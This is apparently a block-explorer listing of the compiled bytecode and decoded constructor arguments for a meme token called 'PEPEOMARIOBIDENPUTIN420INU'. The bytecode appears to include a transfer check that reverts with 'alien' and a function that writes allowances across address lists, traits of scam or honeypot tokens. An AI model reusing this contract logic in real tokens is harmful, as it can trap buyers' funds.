000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000a2457808604811115620009fc57620009fb62000996565b5b600185161562000a0c5780820291505b808102905062000a1c85620009c5565b9450620009dc565b94509492505050565b60008262000a3f576001905062000b12565b8162000a4f576000905062000b12565b816001811462000a68576002811462000a735762000aa9565b600191505062000b12565b60ff84111562000a885762000a8762000996565b5b8360020a91508482111562000aa25762000aa162000996565b5b5062000b12565b5060208310610133831016604e8410600b841016171562000ae35782820a90508381111562000add5762000adc62000996565b5b62000b12565b62000af28484846001620009d2565b9250905081840481111562000b0c5762000b0b62000996565b5b81810290505b9392505050565b600060ff82169050919050565b600062000b338262000583565b915062000b408362000b19565b925062000b6f7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000a2d565b905092915050565b600062000b848262000583565b915062000b918362000583565b925082820262000ba18162000583565b9150828204841483151762000bbb5762000bba62000996565b5b5092915050565b62000bcd8162000583565b82525050565b600060208201905062000bea600083018462000bc2565b92915050565b62000bfb816200053e565b82525050565b600060408201905062000c18600083018562000bc2565b62000c27602083018462000bf0565b9392505050565b600062000c3b8262000583565b915062000c488362000583565b925082820190508082111562000c635762000c6262000996565b5b92915050565b611d528062000c796000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c806370a08231116100975780639ebbaef7116100665780639ebbaef714610278578063a9059cbb146102a8578063dd62ed3e146102d8578063f2fde38b14610308576100f5565b806370a0823114610202578063715018a6146102325780638da5cb5b1461023c57806395d89b411461025a576100f5565b806318160ddd116100d357806318160ddd146101785780631c8e3b1b1461019657806323b872dd146101b4578063313ce567146101e4576100f5565b806306fdde03146100fa578063095ea7b3146101185780630cd94ba114610148575b600080fd5b610102610324565b60405161010f9190611271565b60405180910390f35b610132600480360381019061012d919061133b565b6103b6565b60405161013f9190611396565b60405180910390f35b610162600480360381019061015d91906113b1565b6103cd565b60405161016f91906113ed565b60405180910390f35b610180610419565b60405161018d91906113ed565b60405180910390f35b61019e610423565b6040516101ab91906113ed565b60405180910390f35b6101ce60048036038101906101c99190611408565b61042d565b6040516101db9190611396565b60405180910390f35b6101ec6104f8565b6040516101f99190611477565b60405180910390f35b61021c600480360381019061021791906113b1565b61050f565b60405161022991906113ed565b60405180910390f35b61023a610558565b005b6102446105d9565b60405161025191906114a1565b60405180910390f35b610262610602565b60405161026f9190611271565b60405180910390f35b610292600480360381019061028d9190611604565b610694565b60405161029f9190611396565b60405180910390f35b6102c260048036038101906102bd919061133b565b61080b565b6040516102cf9190611396565b60405180910390f35b6102f260048036038101906102ed9190611660565b610822565b6040516102ff91906113ed565b60405180910390f35b610322600480360381019061031d91906113b1565b6108a9565b005b606060068054610333906116cf565b80601f016020809104026020016040519081016040528092919081815260200182805461035f906116cf565b80156103ac5780601f10610381576101008083540402835291602001916103ac565b820191906000526020600020905b81548152906001019060200180831161038f57829003601f168201915b5050505050905090565b60006103c33384846109af565b6001905092915050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600001549050919050565b6000600954905090565b6000600a54905090565b600061043a848484610b78565b6104ed84336104e885604051806060016040528060288152602001611cf560289139600260008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e949092919063ffffffff16565b6109af565b600190509392505050565b6000600860009054906101000a900460ff16905090565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b3373ffffffffffffffffffffffffffffffffffffffff166105776105d9565b73ffffffffffffffffffffffffffffffffffffffff16146105cd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105c49061174c565b60405180910390fd5b6105d76000610ee9565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060078054610611906116cf565b80601f016020809104026020016040519081016040528092919081815260200182805461063d906116cf565b801561068a5780601f1061065f5761010080835404028352916020019161068a565b820191906000526020600020905b81548152906001019060200180831161066d57829003601f168201915b5050505050905090565b60008033905060006005905060006007826106af91906117ca565b90506000805b87518110156107fc5780826106ca91906117fb565b915060006064856106db919061182f565b9050610702868a84815181106106f4576106f3611871565b5b60200260200101518a610fad565b87600260008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055503073ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258a6040516107e091906113ed565b60405180910390a35080806107f4906118a0565b9150506106b5565b50600194505050505092915050565b6000610818338484610b78565b6001905092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b3373ffffffffffffffffffffffffffffffffffffffff166108c86105d9565b73ffffffffffffffffffffffffffffffffffffffff161461091e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109159061174c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361098d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109849061195a565b60405180910390fd5b61099681610ee9565b50565b600081836109a791906117fb565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a1e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a15906119ec565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a8d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a8490611a7e565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b6b91906113ed565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610be7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bde90611b10565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c56576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c4d90611ba2565b60405180910390fd5b6000600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000015482610ca69190611bc2565b11610ce6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cdd90611c42565b60405180910390fd5b610d5281604051806060016040528060268152602001611ccf60269139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e949092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610de781600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461099990919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610e8791906113ed565b60405180910390a3505050565b6000838311158290610edc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ed39190611271565b60405180910390fd5b5082840390509392505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60008073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361101d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161101490611cae565b60405180910390fd5b600460000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161461112c5780600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282546110c79190611bc2565b9250508190555080600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600001600082825461112091906117fb565b925050819055506111db565b80600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600001600082825461117e9190611bc2565b92505081905550818161119191906117fb565b905080600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600001819055505b50505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561121b578082015181840152602081019050611200565b60008484015250505050565b6000601f19601f8301169050919050565b6000611243826111e1565b61124d81856111ec565b935061125d8185602086016111fd565b61126681611227565b840191505092915050565b6000602082019050818103600083015261128b8184611238565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006112d2826112a7565b9050919050565b6112e2816112c7565b81146112ed57600080fd5b50565b6000813590506112ff816112d9565b92915050565b6000819050919050565b61131881611305565b811461132357600080fd5b50565b6000813590506113358161130f565b92915050565b600080604083850312156113525761135161129d565b5b6000611360858286016112f0565b925050602061137185828601611326565b9150509250929050565b60008115159050919050565b6113908161137b565b82525050565b60006020820190506113ab6000830184611387565b92915050565b6000602082840312156113c7576113c661129d565b5b60006113d5848285016112f0565b91505092915050565b6113e781611305565b82525050565b600060208201905061140260008301846113de565b92915050565b6000806000606084860312156114215761142061129d565b5b600061142f868287016112f0565b9350506020611440868287016112f0565b925050604061145186828701611326565b9150509250925092565b600060ff82169050919050565b6114718161145b565b82525050565b600060208201905061148c6000830184611468565b92915050565b61149b816112c7565b82525050565b60006020820190506114b66000830184611492565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6114f982611227565b810181811067ffffffffffffffff82111715611518576115176114c1565b5b80604052505050565b600061152b611293565b905061153782826114f0565b919050565b600067ffffffffffffffff821115611557576115566114c1565b5b602082029050602081019050919050565b600080fd5b600061158061157b8461153c565b611521565b905080838252602082019050602084028301858111156115a3576115a2611568565b5b835b818110156115cc57806115b888826112f0565b8452602084019350506020810190506115a5565b5050509392505050565b600082601f8301126115eb576115ea6114bc565b5b81356115fb84826020860161156d565b91505092915050565b6000806040838503121561161b5761161a61129d565b5b600083013567ffffffffffffffff811115611639576116386112a2565b5b611645858286016115d6565b925050602061165685828601611326565b9150509250929050565b600080604083850312156116775761167661129d565b5b6000611685858286016112f0565b9250506020611696858286016112f0565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806116e757607f821691505b6020821081036116fa576116f96116a0565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006117366020836111ec565b915061174182611700565b602082019050919050565b6000602082019050818103600083015261176581611729565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006117d582611305565b91506117e083611305565b9250826117f0576117ef61176c565b5b828204905092915050565b600061180682611305565b915061181183611305565b92508282019050808211156118295761182861179b565b5b92915050565b600061183a82611305565b915061184583611305565b925082820261185381611305565b9150828204841483151761186a5761186961179b565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b60006118ab82611305565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036118dd576118dc61179b565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006119446026836111ec565b915061194f826118e8565b604082019050919050565b6000602082019050818103600083015261197381611937565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006119d66024836111ec565b91506119e18261197a565b604082019050919050565b60006020820190508181036000830152611a05816119c9565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611a686022836111ec565b9150611a7382611a0c565b604082019050919050565b60006020820190508181036000830152611a9781611a5b565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611afa6025836111ec565b9150611b0582611a9e565b604082019050919050565b60006020820190508181036000830152611b2981611aed565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611b8c6023836111ec565b9150611b9782611b30565b604082019050919050565b60006020820190508181036000830152611bbb81611b7f565b9050919050565b6000611bcd82611305565b9150611bd883611305565b9250828203905081811115611bf057611bef61179b565b5b92915050565b7f616c69656e000000000000000000000000000000000000000000000000000000600082015250565b6000611c2c6005836111ec565b9150611c3782611bf6565b602082019050919050565b60006020820190508181036000830152611c5b81611c1f565b9050919050565b7f696e76616c696420616464726573730000000000000000000000000000000000600082015250565b6000611c98600f836111ec565b9150611ca382611c62565b602082019050919050565b60006020820190508181036000830152611cc781611c8b565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a264697066735822122094b771055ed1952d2695d35ff383543520a39ccba7e34562160e8fe296a29aca64736f6c63430008120033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000afa4e20d80e528f3983815afc478c590fe48919700000000000000000000000000000000000000000000000000000000fa56ea00000000000000000000000000000000000000000000000000000000000000001a504550454f4d4152494f424944454e505554494e343230494e5500000000000000000000000000000000000000000000000000000000000000000000000000033432300000000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106100f55760003560e01c806370a08231116100975780639ebbaef7116100665780639ebbaef714610278578063a9059cbb146102a8578063dd62ed3e146102d8578063f2fde38b14610308576100f5565b806370a0823114610202578063715018a6146102325780638da5cb5b1461023c57806395d89b411461025a576100f5565b806318160ddd116100d357806318160ddd146101785780631c8e3b1b1461019657806323b872dd146101b4578063313ce567146101e4576100f5565b806306fdde03146100fa578063095ea7b3146101185780630cd94ba114610148575b600080fd5b610102610324565b60405161010f9190611271565b60405180910390f35b610132600480360381019061012d919061133b565b6103b6565b60405161013f9190611396565b60405180910390f35b610162600480360381019061015d91906113b1565b6103cd565b60405161016f91906113ed565b60405180910390f35b610180610419565b60405161018d91906113ed565b60405180910390f35b61019e610423565b6040516101ab91906113ed565b60405180910390f35b6101ce60048036038101906101c99190611408565b61042d565b6040516101db9190611396565b60405180910390f35b6101ec6104f8565b6040516101f99190611477565b60405180910390f35b61021c600480360381019061021791906113b1565b61050f565b60405161022991906113ed565b60405180910390f35b61023a610558565b005b6102446105d9565b60405161025191906114a1565b60405180910390f35b610262610602565b60405161026f9190611271565b60405180910390f35b610292600480360381019061028d9190611604565b610694565b60405161029f9190611396565b60405180910390f35b6102c260048036038101906102bd919061133b565b61080b565b6040516102cf9190611396565b60405180910390f35b6102f260048036038101906102ed9190611660565b610822565b6040516102ff91906113ed565b60405180910390f35b610322600480360381019061031d91906113b1565b6108a9565b005b606060068054610333906116cf565b80601f016020809104026020016040519081016040528092919081815260200182805461035f906116cf565b80156103ac5780601f10610381576101008083540402835291602001916103ac565b820191906000526020600020905b81548152906001019060200180831161038f57829003601f168201915b5050505050905090565b60006103c33384846109af565b6001905092915050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600001549050919050565b6000600954905090565b6000600a54905090565b600061043a848484610b78565b6104ed84336104e885604051806060016040528060288152602001611cf560289139600260008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e949092919063ffffffff16565b6109af565b600190509392505050565b6000600860009054906101000a900460ff16905090565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b3373ffffffffffffffffffffffffffffffffffffffff166105776105d9565b73ffffffffffffffffffffffffffffffffffffffff16146105cd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105c49061174c565b60405180910390fd5b6105d76000610ee9565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060078054610611906116cf565b80601f016020809104026020016040519081016040528092919081815260200182805461063d906116cf565b801561068a5780601f1061065f5761010080835404028352916020019161068a565b820191906000526020600020905b81548152906001019060200180831161066d57829003601f168201915b5050505050905090565b60008033905060006005905060006007826106af91906117ca565b90506000805b87518110156107fc5780826106ca91906117fb565b915060006064856106db919061182f565b9050610702868a84815181106106f4576106f3611871565b5b60200260200101518a610fad565b87600260008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055503073ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258a6040516107e091906113ed565b60405180910390a35080806107f4906118a0565b9150506106b5565b50600194505050505092915050565b6000610818338484610b78565b6001905092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b3373ffffffffffffffffffffffffffffffffffffffff166108c86105d9565b73ffffffffffffffffffffffffffffffffffffffff161461091e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109159061174c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361098d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109849061195a565b60405180910390fd5b61099681610ee9565b50565b600081836109a791906117fb565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a1e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a15906119ec565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a8d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a8490611a7e565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b6b91906113ed565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610be7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bde90611b10565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c56576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c4d90611ba2565b60405180910390fd5b6000600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000015482610ca69190611bc2565b11610ce6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cdd90611c42565b60405180910390fd5b610d5281604051806060016040528060268152602001611ccf60269139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e949092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610de781600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461099990919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610e8791906113ed565b60405180910390a3505050565b6000838311158290610edc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ed39190611271565b60405180910390fd5b5082840390509392505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60008073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361101d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161101490611cae565b60405180910390fd5b600460000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161461112c5780600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282546110c79190611bc2565b9250508190555080600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600001600082825461112091906117fb565b925050819055506111db565b80600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600001600082825461117e9190611bc2565b92505081905550818161119191906117fb565b905080600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600001819055505b50505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561121b578082015181840152602081019050611200565b60008484015250505050565b6000601f19601f8301169050919050565b6000611243826111e1565b61124d81856111ec565b935061125d8185602086016111fd565b61126681611227565b840191505092915050565b6000602082019050818103600083015261128b8184611238565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006112d2826112a7565b9050919050565b6112e2816112c7565b81146112ed57600080fd5b50565b6000813590506112ff816112d9565b92915050565b6000819050919050565b61131881611305565b811461132357600080fd5b50565b6000813590506113358161130f565b92915050565b600080604083850312156113525761135161129d565b5b6000611360858286016112f0565b925050602061137185828601611326565b9150509250929050565b60008115159050919050565b6113908161137b565b82525050565b60006020820190506113ab6000830184611387565b92915050565b6000602082840312156113c7576113c661129d565b5b60006113d5848285016112f0565b91505092915050565b6113e781611305565b82525050565b600060208201905061140260008301846113de565b92915050565b6000806000606084860312156114215761142061129d565b5b600061142f868287016112f0565b9350506020611440868287016112f0565b925050604061145186828701611326565b9150509250925092565b600060ff82169050919050565b6114718161145b565b82525050565b600060208201905061148c6000830184611468565b92915050565b61149b816112c7565b82525050565b60006020820190506114b66000830184611492565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6114f982611227565b810181811067ffffffffffffffff82111715611518576115176114c1565b5b80604052505050565b600061152b611293565b905061153782826114f0565b919050565b600067ffffffffffffffff821115611557576115566114c1565b5b602082029050602081019050919050565b600080fd5b600061158061157b8461153c565b611521565b905080838252602082019050602084028301858111156115a3576115a2611568565b5b835b818110156115cc57806115b888826112f0565b8452602084019350506020810190506115a5565b5050509392505050565b600082601f8301126115eb576115ea6114bc565b5b81356115fb84826020860161156d565b91505092915050565b6000806040838503121561161b5761161a61129d565b5b600083013567ffffffffffffffff811115611639576116386112a2565b5b611645858286016115d6565b925050602061165685828601611326565b9150509250929050565b600080604083850312156116775761167661129d565b5b6000611685858286016112f0565b9250506020611696858286016112f0565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806116e757607f821691505b6020821081036116fa576116f96116a0565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006117366020836111ec565b915061174182611700565b602082019050919050565b6000602082019050818103600083015261176581611729565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006117d582611305565b91506117e083611305565b9250826117f0576117ef61176c565b5b828204905092915050565b600061180682611305565b915061181183611305565b92508282019050808211156118295761182861179b565b5b92915050565b600061183a82611305565b915061184583611305565b925082820261185381611305565b9150828204841483151761186a5761186961179b565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b60006118ab82611305565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036118dd576118dc61179b565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006119446026836111ec565b915061194f826118e8565b604082019050919050565b6000602082019050818103600083015261197381611937565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006119d66024836111ec565b91506119e18261197a565b604082019050919050565b60006020820190508181036000830152611a05816119c9565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611a686022836111ec565b9150611a7382611a0c565b604082019050919050565b60006020820190508181036000830152611a9781611a5b565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611afa6025836111ec565b9150611b0582611a9e565b604082019050919050565b60006020820190508181036000830152611b2981611aed565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611b8c6023836111ec565b9150611b9782611b30565b604082019050919050565b60006020820190508181036000830152611bbb81611b7f565b9050919050565b6000611bcd82611305565b9150611bd883611305565b9250828203905081811115611bf057611bef61179b565b5b92915050565b7f616c69656e000000000000000000000000000000000000000000000000000000600082015250565b6000611c2c6005836111ec565b9150611c3782611bf6565b602082019050919050565b60006020820190508181036000830152611c5b81611c1f565b9050919050565b7f696e76616c696420616464726573730000000000000000000000000000000000600082015250565b6000611c98600f836111ec565b9150611ca382611c62565b602082019050919050565b60006020820190508181036000830152611cc781611c8b565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a264697066735822122094b771055ed1952d2695d35ff383543520a39ccba7e34562160e8fe296a29aca64736f6c63430008120033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000afa4e20d80e528f3983815afc478c590fe48919700000000000000000000000000000000000000000000000000000000fa56ea00000000000000000000000000000000000000000000000000000000000000001a504550454f4d4152494f424944454e505554494e343230494e5500000000000000000000000000000000000000000000000000000000000000000000000000033432300000000000000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): PEPEOMARIOBIDENPUTIN420INU
Arg [1] : symbol_ (string): 420
Arg [2] : _deployx (address): 0xaFa4E20D80e528f3983815afC478c590Fe489197
Arg [3] : totalSupply_ (uint256): 4200000000
-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 000000000000000000000000afa4e20d80e528f3983815afc478c590fe489197
Arg [3] : 00000000000000000000000000000000000000000000000000000000fa56ea00
Arg [4] : 000000000000000000000000000000000000000000000000000000000000001a
Arg [5] : 504550454f4d4152494f424944454e505554494e343230494e55000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000003
Arg [7] : 3432300000000000000000000000000000000000000000000000000000000000
Deployed Bytecode Sourcemap
